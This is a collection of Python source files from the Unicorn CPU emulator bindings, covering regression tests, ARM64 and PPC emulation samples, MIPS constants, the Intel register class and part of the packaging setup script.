        uc.reg_write(UC_X86_REG_EAX, 0xFFFFFFFF)

        with self.assertRaises(UcError) as ex_ctx:
            uc.emu_start(BASE, BASE + len(CODE))

        self.assertEqual(UC_ERR_EXCEPTION, ex_ctx.exception.errno)


if __name__ == '__main__':
    regress.main()



import regress
from unicorn import *
from unicorn.arm_const import *


class BxHang(regress.RegressTest):
    def runTest(self):
        uc = Uc(UC_ARCH_ARM, UC_MODE_ARM)
        uc.mem_map(0x1000, 0x1000)
        uc.mem_write(0x1000, b'\x1e\xff\x2f\x01\x00\x00\xa0\xe1')  # bxeq lr; mov r0, r0
        uc.count = 0

        def hook_block(uc, addr, *args):
            regress.logger.debug('enter block %#06x', addr)
            uc.count += 1

        uc.reg_write(UC_ARM_REG_LR, 0x1004)
        uc.hook_add(UC_HOOK_BLOCK, hook_block)

        regress.logger.debug('block should only run once')
        uc.emu_start(0x1000, 0x1004)

        self.assertEqual(uc.count, 1)


if __name__ == '__main__':
    regress.main()



import regress
import sys
import unittest
from capstone import *
from unicorn import *

CODE = (
    b'\x00\x00\xa4\x12'  # beq $a0, $s5, 0x4008a0
    b'\x6a\x00\x82\x28'  # slti $v0, $a0, 0x6a
    b'\x00\x00\x00\x00'  # nop
)

BASE = 0x400000


class MipsBranchDelay(regress.RegressTest):

    @unittest.skipIf(sys.version_info < (3, 7), reason="requires python3.7 or higher")
    def runTest(self):
        md = Cs(CS_ARCH_MIPS, CS_MODE_MIPS32 + CS_MODE_LITTLE_ENDIAN)

        def disas(code, addr):
            for insn in md.disasm(code, addr):
                regress.logger.debug('%#x: %-8s %s', insn.address, insn.mnemonic, insn.op_str)

        def hook_code(uc, addr, size, _):
            disas(uc.mem_read(addr, size), addr)

        regress.logger.debug('Input instructions:')
        disas(CODE, BASE)

        regress.logger.debug('Hooked instructions:')

        uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN)
        uc.hook_add(UC_HOOK_CODE, hook_code)
        uc.mem_map(BASE, 0x1000)
        uc.mem_write(BASE, CODE)

        self.assertEqual(None, uc.emu_start(BASE, BASE + len(CODE)))


if __name__ == '__main__':
    regress.main()



import platform
import regress
import sys
import unittest
from unicorn import *

try:
    # Only available on Unix: https://docs.python.org/3/library/resource.html
    import resource
except:
    pass

ITERATIONS = 10000


class MemoryLeak(regress.RegressTest):

    @unittest.skipIf(sys.platform == 'win32', reason='Test for Unix only')
    def test(self):
        if platform.system() == "Darwin":
            rusage_multiplier = 1
        elif platform.system() == "Linux":
            rusage_multiplier = 1024
        else:
            # resource.getrusage(...) is platform dependent. Only tested under OS X and Linux.
            self.skipTest('not OSx neither Linux')

        max_rss_before = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * rusage_multiplier

        for _ in range(ITERATIONS):
            mu = Uc(UC_ARCH_X86, UC_MODE_64)
            mu.mem_map(0, 0x1000)
            mu.emu_start(0, 0)

        max_rss_after = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * rusage_multiplier
        rss_increase_per_iteration = (max_rss_after - max_rss_before) / ITERATIONS

        self.assertLess(rss_increase_per_iteration, 8000.0)


if __name__ == '__main__':
    regress.main()



import regress
from unicorn import *
from unicorn.x86_const import *

PAGE_SIZE = 0x1000
ACCESS_ADDR = 0x1000

CODE = (
    b'\xA1\x00\x10\x00\x00'  # mov eax, [0x1000]
    b'\xA1\x00\x10\x00\x00'  # mov eax, [0x1000]
)

BASE = 0x00000000


def hook_mem_read(uc, access, address, size, value, data):
    regress.logger.debug("Reading at %#x", address)
    # BUG: unicorn will segfault when calling "uc.mem_write" to write to a location that was mapped only as UC_PROT_READ
    uc.mem_write(address, CODE)


class REP(regress.RegressTest):
    def runTest(self):
        mu = Uc(UC_ARCH_X86, UC_MODE_32)

        mu.mem_map(BASE, PAGE_SIZE)
        mu.mem_write(BASE, CODE)
        mu.mem_map(ACCESS_ADDR, PAGE_SIZE, UC_PROT_READ)
        mu.hook_add(UC_HOOK_MEM_READ, hook_mem_read, begin=ACCESS_ADDR, end=ACCESS_ADDR + PAGE_SIZE)

        mu.emu_start(BASE, BASE + len(CODE))

        self.assertEqual(0x001000a1, mu.reg_read(UC_X86_REG_EAX))


if __name__ == '__main__':
    regress.main()



#!/usr/bin/env python
# Sample code for ARM64 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com>
# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com>
# AARCH64 Python sample ported by zhangwm <rustydaar@gmail.com>

from unicorn import *
from unicorn.arm64_const import *

# code to be emulated
ARM64_CODE = b"\xab\x05\x00\xb8\xaf\x05\x40\x38"  # str x11, [x13]; ldrb x15, [x13]

# memory address where emulation starts
ADDRESS = 0x10000


# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" % (address, size))


# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (address, size))


# Test ARM64
def test_arm64():
    print("Emulate ARM64 Big-Endian code")
    try:
        # Initialize emulator in ARM mode
        mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM | UC_MODE_BIG_ENDIAN)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, ARM64_CODE)

        # initialize machine registers
        mu.reg_write(UC_ARM64_REG_X11, 0x12345678)
        mu.reg_write(UC_ARM64_REG_X13, 0x10008)
        mu.reg_write(UC_ARM64_REG_X15, 0x33)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(ARM64_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")
        print(">>> As big endian, X15 should be 0x12:")

        x11 = mu.reg_read(UC_ARM64_REG_X11)
        x13 = mu.reg_read(UC_ARM64_REG_X13)
        x15 = mu.reg_read(UC_ARM64_REG_X15)
        print(">>> X15 = 0x%x" % x15)

    except UcError as e:
        print("ERROR: %s" % e)


if __name__ == '__main__':
    test_arm64()



# By Mariano Graziano

import regress
import struct
import sys
import unittest
from unicorn import *
from unicorn.x86_const import *


class Emulator:
    def __init__(self, code, stack):
        def __page_aligned(address):
            return address & ~(0x1000 - 1)

        self.unicorn_code = code
        self.unicorn_stack = stack

        self.mu = Uc(UC_ARCH_X86, UC_MODE_64)
        self.mu.ctl_set_tlb_mode(UC_TLB_VIRTUAL)
        self.mu.ctl_set_tcg_buffer_size(1 * 1024 * 1024) # 1MB

        regress.logger.debug("mapping code  : %#x", __page_aligned(code))
        regress.logger.debug("mapping stack : %#x", __page_aligned(stack))

        self.mu.mem_map(__page_aligned(code), 0x1000)
        self.mu.mem_map(__page_aligned(stack), 0x1000)

        self.mu.reg_write(UC_X86_REG_RSP, stack)
        self.mu.reg_write(UC_X86_REG_RIP, code)

        self.set_hooks()

    def set_hooks(self):
        self.mu.hook_add(UC_HOOK_MEM_WRITE, self.hook_mem_access)
        self.mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, self.hook_mem_invalid)
        self.mu.hook_add(UC_HOOK_MEM_FETCH_UNMAPPED, self.hook_mem_fetch_unmapped)

    def hook_mem_fetch_unmapped(self, uc, access, address, size, value, user_data):
        next_ip = self.unicorn_code + size

        self.write_reg(UC_X86_REG_RIP, next_ip)
        self.write_data(next_ip, b"\x90")
        # self.write_reg(UC_X86_REG_RIP, address)  # ???

        return True

    def hook_mem_invalid(self, uc, access, address, size, value, user_data):
        regress.logger.debug("invalid mem access: access type = %d, to = %#x, size = %u, value = %#x", access, address,
                             size, value)

        return True

    def hook_mem_access(self, uc, access, address, size, value, user_data):
        return True

    def emu(self, steps):
        ip = self.mu.reg_read(UC_X86_REG_RIP)
        max_intel_insn_size = 15

        regress.logger.debug("starting at   : %#x", ip)
        self.mu.emu_start(ip, ip + max_intel_insn_size, count=steps)

    def write_data(self, address, content):
        self.mu.mem_write(address, content)

    def write_reg(self, reg, value):
        self.mu.reg_write(reg, value)


class TranslatorBuffer(regress.RegressTest):
    def init_unicorn(self, ip, sp, magic):
        emu = Emulator(ip, sp)

        emu.write_data(ip, b"\xf4" * 8)
        emu.write_data(sp, struct.pack("<Q", magic))

        emu.emu(1)

    @unittest.skipIf(sys.version_info < (3, 7), reason="requires python3.7 or higher")
    def runTest(self):
        ip_base = 0x000fffff816a0000  # was: 0xffffffff816a0000
        sp_base = 0x000f88001b800000  # was: 0xffff88001b800000
        mg_base = 0x000f880026f02000  # was: 0xffff880026f02000

        ips = range(0x9000, 0xf000, 16) # was: ..., 8
        sps = range(0x0000, 0x6000, 16) # was: ..., 8

        for i, (ip, sp) in enumerate(zip(ips, sps)):
            self.init_unicorn(ip_base + ip, sp_base + sp, mg_base + i * 8)


if __name__ == '__main__':
    regress.main()



# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [mips_const.py]

# MIPS32 CPUS

UC_CPU_MIPS32_4KC = 0
UC_CPU_MIPS32_4KM = 1
UC_CPU_MIPS32_4KECR1 = 2
UC_CPU_MIPS32_4KEMR1 = 3
UC_CPU_MIPS32_4KEC = 4
UC_CPU_MIPS32_4KEM = 5
UC_CPU_MIPS32_24KC = 6
UC_CPU_MIPS32_24KEC = 7
UC_CPU_MIPS32_24KF = 8
UC_CPU_MIPS32_34KF = 9
UC_CPU_MIPS32_74KF = 10
UC_CPU_MIPS32_M14K = 11
UC_CPU_MIPS32_M14KC = 12
UC_CPU_MIPS32_P5600 = 13
UC_CPU_MIPS32_MIPS32R6_GENERIC = 14
UC_CPU_MIPS32_I7200 = 15
UC_CPU_MIPS32_ENDING = 16

# MIPS64 CPUS

UC_CPU_MIPS64_R4000 = 0
UC_CPU_MIPS64_VR5432 = 1
UC_CPU_MIPS64_5KC = 2
UC_CPU_MIPS64_5KF = 3
UC_CPU_MIPS64_20KC = 4
UC_CPU_MIPS64_MIPS64R2_GENERIC = 5
UC_CPU_MIPS64_5KEC = 6
UC_CPU_MIPS64_5KEF = 7
UC_CPU_MIPS64_I6400 = 8
UC_CPU_MIPS64_I6500 = 9
UC_CPU_MIPS64_LOONGSON_2E = 10
UC_CPU_MIPS64_LOONGSON_2F = 11
UC_CPU_MIPS64_MIPS64DSPR2 = 12
UC_CPU_MIPS64_ENDING = 13

# MIPS registers

UC_MIPS_REG_INVALID = 0

# General purpose registers
UC_MIPS_REG_PC = 1
UC_MIPS_REG_0 = 2
UC_MIPS_REG_1 = 3
UC_MIPS_REG_2 = 4
UC_MIPS_REG_3 = 5
UC_MIPS_REG_4 = 6
UC_MIPS_REG_5 = 7
UC_MIPS_REG_6 = 8
UC_MIPS_REG_7 = 9
UC_MIPS_REG_8 = 10
UC_MIPS_REG_9 = 11
UC_MIPS_REG_10 = 12
UC_MIPS_REG_11 = 13
UC_MIPS_REG_12 = 14
UC_MIPS_REG_13 = 15
UC_MIPS_REG_14 = 16
UC_MIPS_REG_15 = 17
UC_MIPS_REG_16 = 18
UC_MIPS_REG_17 = 19
UC_MIPS_REG_18 = 20
UC_MIPS_REG_19 = 21
UC_MIPS_REG_20 = 22
UC_MIPS_REG_21 = 23
UC_MIPS_REG_22 = 24
UC_MIPS_REG_23 = 25
UC_MIPS_REG_24 = 26
UC_MIPS_REG_25 = 27
UC_MIPS_REG_26 = 28
UC_MIPS_REG_27 = 29
UC_MIPS_REG_28 = 30
UC_MIPS_REG_29 = 31
UC_MIPS_REG_30 = 32
UC_MIPS_REG_31 = 33

# DSP registers
UC_MIPS_REG_DSPCCOND = 34
UC_MIPS_REG_DSPCARRY = 35
UC_MIPS_REG_DSPEFI = 36
UC_MIPS_REG_DSPOUTFLAG = 37
UC_MIPS_REG_DSPOUTFLAG16_19 = 38
UC_MIPS_REG_DSPOUTFLAG20 = 39
UC_MIPS_REG_DSPOUTFLAG21 = 40
UC_MIPS_REG_DSPOUTFLAG22 = 41
UC_MIPS_REG_DSPOUTFLAG23 = 42
UC_MIPS_REG_DSPPOS = 43
UC_MIPS_REG_DSPSCOUNT = 44

# ACC registers
UC_MIPS_REG_AC0 = 45
UC_MIPS_REG_AC1 = 46
UC_MIPS_REG_AC2 = 47
UC_MIPS_REG_AC3 = 48

# COP registers
UC_MIPS_REG_CC0 = 49
UC_MIPS_REG_CC1 = 50
UC_MIPS_REG_CC2 = 51
UC_MIPS_REG_CC3 = 52
UC_MIPS_REG_CC4 = 53
UC_MIPS_REG_CC5 = 54
UC_MIPS_REG_CC6 = 55
UC_MIPS_REG_CC7 = 56

# FPU registers
UC_MIPS_REG_F0 = 57
UC_MIPS_REG_F1 = 58
UC_MIPS_REG_F2 = 59
UC_MIPS_REG_F3 = 60
UC_MIPS_REG_F4 = 61
UC_MIPS_REG_F5 = 62
UC_MIPS_REG_F6 = 63
UC_MIPS_REG_F7 = 64
UC_MIPS_REG_F8 = 65
UC_MIPS_REG_F9 = 66
UC_MIPS_REG_F10 = 67
UC_MIPS_REG_F11 = 68
UC_MIPS_REG_F12 = 69
UC_MIPS_REG_F13 = 70
UC_MIPS_REG_F14 = 71
UC_MIPS_REG_F15 = 72
UC_MIPS_REG_F16 = 73
UC_MIPS_REG_F17 = 74
UC_MIPS_REG_F18 = 75
UC_MIPS_REG_F19 = 76
UC_MIPS_REG_F20 = 77
UC_MIPS_REG_F21 = 78
UC_MIPS_REG_F22 = 79
UC_MIPS_REG_F23 = 80
UC_MIPS_REG_F24 = 81
UC_MIPS_REG_F25 = 82
UC_MIPS_REG_F26 = 83
UC_MIPS_REG_F27 = 84
UC_MIPS_REG_F28 = 85
UC_MIPS_REG_F29 = 86
UC_MIPS_REG_F30 = 87
UC_MIPS_REG_F31 = 88
UC_MIPS_REG_FCC0 = 89
UC_MIPS_REG_FCC1 = 90
UC_MIPS_REG_FCC2 = 91
UC_MIPS_REG_FCC3 = 92
UC_MIPS_REG_FCC4 = 93
UC_MIPS_REG_FCC5 = 94
UC_MIPS_REG_FCC6 = 95
UC_MIPS_REG_FCC7 = 96

# AFPR128
UC_MIPS_REG_W0 = 97
UC_MIPS_REG_W1 = 98
UC_MIPS_REG_W2 = 99
UC_MIPS_REG_W3 = 100
UC_MIPS_REG_W4 = 101
UC_MIPS_REG_W5 = 102
UC_MIPS_REG_W6 = 103
UC_MIPS_REG_W7 = 104
UC_MIPS_REG_W8 = 105
UC_MIPS_REG_W9 = 106
UC_MIPS_REG_W10 = 107
UC_MIPS_REG_W11 = 108
UC_MIPS_REG_W12 = 109
UC_MIPS_REG_W13 = 110
UC_MIPS_REG_W14 = 111
UC_MIPS_REG_W15 = 112
UC_MIPS_REG_W16 = 113
UC_MIPS_REG_W17 = 114
UC_MIPS_REG_W18 = 115
UC_MIPS_REG_W19 = 116
UC_MIPS_REG_W20 = 117
UC_MIPS_REG_W21 = 118
UC_MIPS_REG_W22 = 119
UC_MIPS_REG_W23 = 120
UC_MIPS_REG_W24 = 121
UC_MIPS_REG_W25 = 122
UC_MIPS_REG_W26 = 123
UC_MIPS_REG_W27 = 124
UC_MIPS_REG_W28 = 125
UC_MIPS_REG_W29 = 126
UC_MIPS_REG_W30 = 127
UC_MIPS_REG_W31 = 128
UC_MIPS_REG_HI = 129
UC_MIPS_REG_LO = 130
UC_MIPS_REG_P0 = 131
UC_MIPS_REG_P1 = 132
UC_MIPS_REG_P2 = 133
UC_MIPS_REG_MPL0 = 134
UC_MIPS_REG_MPL1 = 135
UC_MIPS_REG_MPL2 = 136
UC_MIPS_REG_CP0_CONFIG3 = 137
UC_MIPS_REG_CP0_USERLOCAL = 138
UC_MIPS_REG_CP0_STATUS = 139
UC_MIPS_REG_FIR = 140
UC_MIPS_REG_FCSR = 141
UC_MIPS_REG_ENDING = 142
UC_MIPS_REG_ZERO = 2
UC_MIPS_REG_AT = 3
UC_MIPS_REG_V0 = 4
UC_MIPS_REG_V1 = 5
UC_MIPS_REG_A0 = 6
UC_MIPS_REG_A1 = 7
UC_MIPS_REG_A2 = 8
UC_MIPS_REG_A3 = 9
UC_MIPS_REG_T0 = 10
UC_MIPS_REG_T1 = 11
UC_MIPS_REG_T2 = 12
UC_MIPS_REG_T3 = 13
UC_MIPS_REG_T4 = 14
UC_MIPS_REG_T5 = 15
UC_MIPS_REG_T6 = 16
UC_MIPS_REG_T7 = 17
UC_MIPS_REG_S0 = 18
UC_MIPS_REG_S1 = 19
UC_MIPS_REG_S2 = 20
UC_MIPS_REG_S3 = 21
UC_MIPS_REG_S4 = 22
UC_MIPS_REG_S5 = 23
UC_MIPS_REG_S6 = 24
UC_MIPS_REG_S7 = 25
UC_MIPS_REG_T8 = 26
UC_MIPS_REG_T9 = 27
UC_MIPS_REG_K0 = 28
UC_MIPS_REG_K1 = 29
UC_MIPS_REG_GP = 30
UC_MIPS_REG_SP = 31
UC_MIPS_REG_FP = 32
UC_MIPS_REG_S8 = 32
UC_MIPS_REG_RA = 33
UC_MIPS_REG_HI0 = 45
UC_MIPS_REG_HI1 = 46
UC_MIPS_REG_HI2 = 47
UC_MIPS_REG_HI3 = 48
UC_MIPS_REG_LO0 = 45
UC_MIPS_REG_LO1 = 46
UC_MIPS_REG_LO2 = 47
UC_MIPS_REG_LO3 = 48



"""Intel architecture classes and structures.
"""
# @author elicn

from typing import Any, Callable, Tuple, Type

import ctypes

# traditional unicorn imports
from unicorn import x86_const as const
from unicorn.unicorn_const import UC_ERR_ARG, UC_HOOK_INSN

# newly introduced unicorn imports
from ..unicorn import Uc, UcError, uccallback
from .types import uc_engine, UcTupledReg, UcReg128, UcReg256, UcReg512

X86MMRReg = Tuple[int, int, int, int]
X86MSRReg = Tuple[int, int]
X86FPReg = Tuple[int, int]

HOOK_INSN_IN_CFUNC      = ctypes.CFUNCTYPE(ctypes.c_uint32, uc_engine, ctypes.c_uint32, ctypes.c_int, ctypes.c_void_p)
HOOK_INSN_OUT_CFUNC     = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32, ctypes.c_void_p)
HOOK_INSN_SYSCALL_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_void_p)
HOOK_INSN_CPUID_CFUNC   = ctypes.CFUNCTYPE(ctypes.c_uint32, uc_engine, ctypes.c_void_p)


class UcRegMMR(UcTupledReg[X86MMRReg]):
    """Memory-Management Register for instructions IDTR, GDTR, LDTR, TR.
    """

    _fields_ = (
        ('selector', ctypes.c_uint16),  # not used by GDTR and IDTR
        ('base',     ctypes.c_uint64),  # handle 32 or 64 bit CPUs
        ('limit',    ctypes.c_uint32),
        ('flags',    ctypes.c_uint32)   # not used by GDTR and IDTR
    )


class UcRegMSR(UcTupledReg[X86MSRReg]):
    """Intel Model Specific Register
    """

    _fields_ = (
        ('rid', ctypes.c_uint32),
        ('val', ctypes.c_uint64)
    )

    @property
    def value(self) -> int:
        return self.val


class UcRegFPR(UcTupledReg[X86FPReg]):
    """Intel Floating Point Register
    """

    _fields_ = (
        ('mantissa', ctypes.c_uint64),
        ('exponent', ctypes.c_uint16)
    )


class UcIntel(Uc):
    """Unicorn subclass for Intel architecture.
    """

    REG_RANGE_MSR = (const.UC_X86_REG_MSR,)

    REG_RANGE_MMR = (
        const.UC_X86_REG_IDTR,
        const.UC_X86_REG_GDTR,
        const.UC_X86_REG_LDTR,
        const.UC_X86_REG_TR
    )

    REG_RANGE_FP  = range(const.UC_X86_REG_FP0,  const.UC_X86_REG_FP7   + 1)
    REG_RANGE_XMM = range(const.UC_X86_REG_XMM0, const.UC_X86_REG_XMM31 + 1)
    REG_RANGE_YMM = range(const.UC_X86_REG_YMM0, const.UC_X86_REG_YMM31 + 1)
    REG_RANGE_ZMM = range(const.UC_X86_REG_ZMM0, const.UC_X86_REG_ZMM31 + 1)

    def hook_add(self, htype: int, callback: Callable, user_data: Any = None, begin: int = 1, end: int = 0, aux1: int = 0, aux2: int = 0) -> int:
        if htype != UC_HOOK_INSN:
            return super().hook_add(htype, callback, user_data, begin, end, aux1, aux2)

        insn = ctypes.c_int(aux1)

        def __hook_insn_in():
            @uccallback(self, HOOK_INSN_IN_CFUNC)
            def __hook_insn_in_cb(uc: Uc, port: int, size: int, key: int) -> int:
                return callback(uc, port, size, user_data)

            return __hook_insn_in_cb

        def __hook_insn_out():
            @uccallback(self, HOOK_INSN_OUT_CFUNC)
            def __hook_insn_out_cb(uc: Uc, port: int, size: int, value: int, key: int):
                callback(uc, port, size, value, user_data)

            return __hook_insn_out_cb

        def __hook_insn_syscall():
            @uccallback(self, HOOK_INSN_SYSCALL_CFUNC)
            def __hook_insn_syscall_cb(uc: Uc, key: int):
                callback(uc, user_data)

            return __hook_insn_syscall_cb

        def __hook_insn_cpuid():
            @uccallback(self, HOOK_INSN_CPUID_CFUNC)
            def __hook_insn_cpuid_cb(uc: Uc, key: int) -> int:
                return callback(uc, user_data)

            return __hook_insn_cpuid_cb

        handlers = {
            const.UC_X86_INS_IN       : __hook_insn_in,
            const.UC_X86_INS_OUT      : __hook_insn_out,
            const.UC_X86_INS_SYSCALL  : __hook_insn_syscall,
            const.UC_X86_INS_SYSENTER : __hook_insn_syscall,
            const.UC_X86_INS_CPUID    : __hook_insn_cpuid
        }

        handler = handlers.get(insn.value)

        if handler is None:
            raise UcError(UC_ERR_ARG)

        fptr = handler()

        return getattr(self, '_Uc__do_hook_add')(htype, fptr, begin, end, insn)

    @classmethod
    def _select_reg_class(cls, reg_id: int) -> Type:
        """Select the appropriate class for the specified architectural register.
        """

        reg_class = (
            (UcIntel.REG_RANGE_MSR, UcRegMSR),
            (UcIntel.REG_RANGE_MMR, UcRegMMR),
            (UcIntel.REG_RANGE_FP,  UcRegFPR),
            (UcIntel.REG_RANGE_XMM, UcReg128),
            (UcIntel.REG_RANGE_YMM, UcReg256),
            (UcIntel.REG_RANGE_ZMM, UcReg512)
        )

        return next((c for rng, c in reg_class if reg_id in rng), cls._DEFAULT_REGTYPE)

    def msr_read(self, msr_id: int) -> int:
        """Read a model-specific register.

        Args:
            msr_id: MSR index

        Returns: MSR value
        """

        return self.reg_read(const.UC_X86_REG_MSR, msr_id)

    def msr_write(self, msr_id: int, value: int) -> None:
        """Write to a model-specific register.

        Args:
            msr_id: MSR index
            value: new MSR value
        """

        self.reg_write(const.UC_X86_REG_MSR, (msr_id, value))


__all__ = ['UcRegMMR', 'UcRegMSR', 'UcRegFPR', 'UcIntel']



#!/usr/bin/env python
# Sample code for PPC of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com>

from unicorn import *
from unicorn.ppc_const import *

# code to be emulated
PPC_CODE = b"\x7F\x46\x1A\x14"  # add       r26, r6, r3
# memory address where emulation starts
ADDRESS = 0x10000


# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" % (address, size))


# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (address, size))


# Test PPC
def test_ppc():
    print("Emulate PPC code")
    try:
        # Initialize emulator in PPC EB mode
        mu = Uc(UC_ARCH_PPC, UC_MODE_PPC32 | UC_MODE_BIG_ENDIAN)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, PPC_CODE)

        # initialize machine registers
        mu.reg_write(UC_PPC_REG_3, 0x1234)
        mu.reg_write(UC_PPC_REG_6, 0x6789)
        mu.reg_write(UC_PPC_REG_26, 0x5555)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(PPC_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        r26 = mu.reg_read(UC_PPC_REG_26)
        print(">>> r26 = 0x%x" % r26)

    except UcError as e:
        print("ERROR: %s" % e)


if __name__ == '__main__':
    test_ppc()



# Python binding for Unicorn engine. Nguyen Anh Quynh <aquynh@gmail.com>

import glob
import logging
import os
import platform
import shutil
import subprocess
import sys
from setuptools import setup
from setuptools.command.build_py import build_py
from setuptools.command.sdist import sdist

log = logging.getLogger(__name__)

# are we building from the repository or from a source distribution?
ROOT_DIR = os.path.dirname(os.path.realpath(__file__))
LIBS_DIR = os.path.join(ROOT_DIR, 'unicorn', 'lib')
HEADERS_DIR = os.path.join(ROOT_DIR, 'unicorn', 'include')
SRC_DIR = os.path.join(ROOT_DIR, 'src')
UC_DIR = SRC_DIR if os.path.exists(SRC_DIR) else os.path.join(ROOT_DIR, '../..')
BUILD_DIR = os.path.join(UC_DIR, 'build_python')

if sys.platform == 'darwin':
    LIBRARY_FILE = "libunicorn.2.dylib"
    STATIC_LIBRARY_FILE = "libunicorn.a"
elif sys.platform in ('win32', 'cygwin'):
    LIBRARY_FILE = "unicorn.dll"
    STATIC_LIBRARY_FILE = "unicorn.lib"
else:
    LIBRARY_FILE = "libunicorn.so.2"
    STATIC_LIBRARY_FILE = "libunicorn.a"


def clean_bins():
    shutil.rmtree(LIBS_DIR, ignore_errors=True)
    shutil.rmtree(HEADERS_DIR, ignore_errors=True)


def copy_sources():
    """
    Copy the C sources into the source directory.
    This rearranges the source files under the python distribution
    directory.
    """
    shutil.rmtree(SRC_DIR, ignore_errors=True)
    os.mkdir(SRC_DIR)

    shutil.copytree(os.path.join(ROOT_DIR, '../../qemu'), os.path.join(SRC_DIR, 'qemu/'))
    shutil.copytree(os.path.join(ROOT_DIR, '../../msvc'), os.path.join(SRC_DIR, 'msvc/'))
    shutil.copytree(os.path.join(ROOT_DIR, '../../include'), os.path.join(SRC_DIR, 'include/'))
    # make -> configure -> clean -> clean tests fails unless tests is present
    shutil.copytree(os.path.join(ROOT_DIR, '../../tests'), os.path.join(SRC_DIR, 'tests/'))
    shutil.copytree(os.path.join(ROOT_DIR, '../../samples'), os.path.join(SRC_DIR, 'samples/'))
    shutil.copytree(os.path.join(ROOT_DIR, '../../glib_compat'), os.path.join(SRC_DIR, 'glib_compat/'))
    shutil.copytree(os.path.join(ROOT_DIR, '../../cmake'), os.path.join(SRC_DIR, 'cmake/'))

    try:
        # remove site-specific configuration file, might not exist
        os.remove(os.path.join(SRC_DIR, 'qemu/config-host.mak'))
    except OSError:
        pass

    src = []
    src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.[ch]")))
    src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.mk")))
    src.extend(glob.glob(os.path.join(ROOT_DIR, "../../LICENSE*")))
    src.extend(glob.glob(os.path.join(ROOT_DIR, "../../README.md")))
    src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.TXT")))
    src.extend(glob.glob(os.path.join(ROOT_DIR, "../../CMakeLists.txt")))

    for filename in src:
        outpath = os.path.join(SRC_DIR, os.path.basename(filename))
        log.info("%s -> %s" % (filename, outpath))
        shutil.copy(filename, outpath)


def build_libraries():
    """
    Prepare the unicorn directory for a binary distribution or installation.
    Builds shared libraries and copies header files.

    Will use a src/ dir if one exists in the current directory, otherwise assumes it's in the repo
    """
    clean_bins()
    os.mkdir(HEADERS_DIR)
    os.mkdir(LIBS_DIR)

    # copy public headers
    shutil.copytree(os.path.join(UC_DIR, 'include', 'unicorn'), os.path.join(HEADERS_DIR, 'unicorn'))

    # check if a prebuilt library exists and if so, use it instead of building
    if os.path.exists(os.path.join(ROOT_DIR, 'prebuilt', LIBRARY_FILE)):
        shutil.copy(os.path.join(ROOT_DIR, 'prebuilt', LIBRARY_FILE), LIBS_DIR)
        if STATIC_LIBRARY_FILE is not None and os.path.exists(os.path.join(ROOT_DIR, 'prebuilt', STATIC_LIBRARY_FILE)):
            shutil.copy(os.path.join(ROOT_DIR, 'prebuilt', STATIC_LIBRARY_FILE), LIBS_DIR)
        return

    # otherwise, build
    if not os.path.exists(BUILD_DIR):
        os.mkdir(BUILD_DIR)

    has_msbuild = shutil.which('msbuild') is not None
    conf = 'Debug' if int(os.getenv('DEBUG', 0)) else 'Release'
    cmake_args = ['cmake', '-B', BUILD_DIR, "-DCMAKE_BUILD_TYPE=" + conf, "-DUNICORN_BUILD_TESTS=off"]
    if os.getenv("UNICORN_TRACER"):
        cmake_args += ["-DUNICORN_TRACER=on"]
    if conf == 'Debug':
        cmake_args += ["-DUNICORN_LOGGING=on"]

    if has_msbuild and sys.platform == 'win32':
        generators = os.getenv('GENERATORS') or 'Visual Studio 16 2019'
        plat = 'Win32' if platform.architecture()[0] == '32bit' else 'x64'
        cmake_args += ['-G', generators, "-A", plat]
        subprocess.check_call(cmake_args, cwd=UC_DIR)
        subprocess.check_call(['msbuild', 'unicorn.sln', '-m', '-p:Platform=' + plat, '-p:Configuration=' + conf],
                              cwd=BUILD_DIR)

        obj_dir = os.path.join(BUILD_DIR, conf)
        shutil.copy(os.path.join(obj_dir, LIBRARY_FILE), LIBS_DIR)
        shutil.copy(os.path.join(obj_dir, STATIC_LIBRARY_FILE), LIBS_DIR)
    else:
        cmake_args += ['-S', UC_DIR]
        subprocess.check_call(cmake_args, cwd=UC_DIR)
        threads = os.getenv("THREADS", "4")
        subprocess.check_call(["cmake", "--build", ".", "-j" + threads], cwd=BUILD_DIR)

        shutil.copy(os.path.join(BUILD_DIR, LIBRARY_FILE), LIBS_DIR)
        shutil.copy(os.path.join(BUILD_DIR, STATIC_LIBRARY_FILE), LIBS_DIR)


class CustomSDist(sdist):
    def run(self):
        clean_bins()
        copy_sources()
